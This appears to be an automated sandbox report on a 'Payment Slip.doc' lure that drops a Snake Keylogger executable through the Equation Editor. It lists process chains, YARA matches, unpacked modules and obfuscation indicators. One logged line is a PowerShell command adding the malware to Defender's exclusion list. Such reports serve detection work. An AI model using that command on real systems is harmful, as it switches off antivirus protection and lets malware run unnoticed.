                  Source: Process Memory Space: vvndewepeter91026.exe PID: 3616, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: LLnsOpxxAnmWi[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: vvndewepeter91026.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 5.2.vvndewepeter91026.exe.3722a30.6.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.vvndewepeter91026.exe.3722a30.6.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.vvndewepeter91026.exe.3722a30.6.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.vvndewepeter91026.exe.3588d18.7.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.vvndewepeter91026.exe.3588d18.7.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.vvndewepeter91026.exe.3588d18.7.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, Uel8r1lQF2PkteGZrv.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, Uel8r1lQF2PkteGZrv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, E0RYX9X2eibsstJT2l.csSecurity API names: _0020.SetAccessControl
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, E0RYX9X2eibsstJT2l.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, E0RYX9X2eibsstJT2l.csSecurity API names: _0020.AddAccessRule
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, Uel8r1lQF2PkteGZrv.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, Uel8r1lQF2PkteGZrv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, E0RYX9X2eibsstJT2l.csSecurity API names: _0020.SetAccessControl
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, E0RYX9X2eibsstJT2l.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, E0RYX9X2eibsstJT2l.csSecurity API names: _0020.AddAccessRule
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@9/14@23/9
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$yment Slip.docJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeMutant created: NULL
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRB51B.tmpJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......4.......N$.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......4.......Z$.........................s............h.(.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......4.......m$.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......4........$.........................s............h.(.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......4........$.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......4........$.........................s............h.(.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n...............(................$.........................s............h.(.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(................$.........................s............h.(.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........%.........................s............h.(..... .......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(................%.........................s............h.(.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............,%.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............8%.........................s............h.(.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....J%.........................s............h.(.....$.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............V%.........................s............h.(.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............h%.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............t%.........................s............h.(.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............h.(.....2.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(................%.........................s............h.(.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(................%.........................s....................l.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(................%.........................s............h.(.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(................%.........................s............h.(.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(................%.........................s............h.(.............................Jump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: Payment Slip.docReversingLabs: Detection: 44%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe"
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe"
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess created: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe"
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess created: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe"Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: riched20.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                  Source: Payment Slip.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Payment Slip.doc
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: LLnsOpxxAnmWi[1].exe.2.dr, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                  Source: vvndewepeter91026.exe.2.dr, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.vvndewepeter91026.exe.25802e8.3.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.vvndewepeter91026.exe.3d0000.0.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.vvndewepeter91026.exe.252583c.4.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.vvndewepeter91026.exe.2576cd0.2.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, E0RYX9X2eibsstJT2l.cs.Net Code: zqfO5R4lW8PGwS1pTgt System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.vvndewepeter91026.exe.252ee54.5.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.vvndewepeter91026.exe.37a7450.8.raw.unpack, E0RYX9X2eibsstJT2l.cs.Net Code: zqfO5R4lW8PGwS1pTgt System.Reflection.Assembly.Load(byte[])
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00546354 push ss; ret 2_2_005464EC
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005401F4 push eax; retf 2_2_005401F5
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0054FB99 push eax; ret 2_2_0054FBA1
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0054C28C pushad ; retn 0054h2_2_0054C28D
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 5_2_002662A4 push esp; iretd 5_2_002662A9
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 5_2_00266922 pushfd ; iretd 5_2_00266929
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 5_2_00265F9A push eax; retf 5_2_00265FA1
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_002321AD push ebx; iretd 8_2_002321EA
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_002321FD push ebx; iretd 8_2_002321EA
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_0023D410 push edi; retf 0023h8_2_0023D411
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00609590 pushfd ; retn 005Eh8_2_00609591
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C328F7 push ds; ret 8_2_00C328FE
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C32880 push cs; ret 8_2_00C32882
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C32847 push es; ret 8_2_00C3284A
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C32845 push es; ret 8_2_00C32846
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C32903 push ds; ret 8_2_00C32906
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00C32901 push ds; ret 8_2_00C32902
                  Source: LLnsOpxxAnmWi[1].exe.2.drStatic PE information: section name: .text entropy: 7.882388794743662
                  Source: vvndewepeter91026.exe.2.drStatic PE information: section name: .text entropy: 7.882388794743662
                  Source: 5.2.vvndewepeter91026.exe.25802e8.3.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                  Source: 5.2.vvndewepeter91026.exe.3d0000.0.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                  Source: 5.2.vvndewepeter91026.exe.252583c.4.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                  Source: 5.2.vvndewepeter91026.exe.2576cd0.2.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, Rsjwms4Wh8At7jltVf.csHigh entropy of concatenated method names: 'saV14aRn5H', 'moE1P52r93', 'TKw1lioyLO', 'Tgp1pca6Bh', 'Cmy1we7IUo', 'Wgq1DupFs5', 'CaI1Mi57nK', 'Lbw1sLeqBx', 'idZ13c8NAv', 'O0T1mxeA09'
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, hnb1mywmKd17dlbrAS.csHigh entropy of concatenated method names: 'Dispose', 'mR89ae4IBQ', 'SJdk0qMKGV', 'puBVVvKaKN', 'tps9oyNhKU', 'PRD9z8IgcF', 'ProcessDialogKey', 'E2dk8n82kY', 't9gk9jtrH3', 'mBmkkAPsqe'
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, LVNaJWsMIVA7LTLASE.csHigh entropy of concatenated method names: 'zu7RHG1UCo', 'vEbR0GP5w9', 'Eo1RnLElCC', 'zSyRb4C8gr', 'L0DRqt1jRb', 'TXZRg6Ppie', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, D33N8oUtGVx7cDxPuT.csHigh entropy of concatenated method names: 'Lp7JThJpMH', 'q8ZJr8Jvgu', 'xaoJqZNHsW', 'CwFJX9qL4U', 'BgjJ0sJB97', 'HlbJnZxrmw', 'UUJJbpHxl3', 'TmgJgfpCvS', 'OX8Jiv5yws', 'f4pJfSeAAh'
                  Source: 5.2.vvndewepeter91026.exe.5510000.9.raw.unpack, zQyvpDqyxKTxd6tm0NN.csHigh entropy of concatenated method names: 'GR7x4eMqyc', 'Kq8xPbdu6R', 'J7BxlIIphe', 'GQ7xpT3Nxd', 'LmaxwG8D2Y', 'R9hxDqi7L0', 'Ax6xMaB0Zt', 'NxYxs9KyRH', 'MlHx3p2K2W', 'VG5xmLUKfn'
